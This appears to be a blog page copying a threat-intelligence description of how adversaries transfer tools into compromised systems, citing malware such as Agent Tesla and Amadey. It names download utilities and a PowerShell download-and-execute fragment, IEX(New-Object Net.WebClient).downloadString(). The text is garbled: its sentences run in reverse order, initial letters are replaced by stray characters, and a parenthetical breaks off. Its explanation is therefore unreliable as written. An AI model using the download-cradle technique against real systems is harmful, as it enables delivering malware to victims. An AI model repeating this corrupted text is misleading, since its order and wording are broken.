Īmadey can download and execute files to further infect a host machine with additional malware. Ījax Security Team has used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system. Īgent.btz attempts to download an encrypted binary from a specified domain. Īgent Tesla can download additional files for execution on the victim’s machine. Īction RAT has the ability to download additional payloads onto an infected machine. ĪBK has the ability to download files from C2. ĭuring the 2015 Ukraine Electric Power Attack, Sandworm Team pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine. In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. Īdversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts.įiles can also be transferred using various Web Services as well as native or otherwise present tools on the victim system. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget. On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Adversaries may transfer tools or other files from an external system into a compromised environment.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |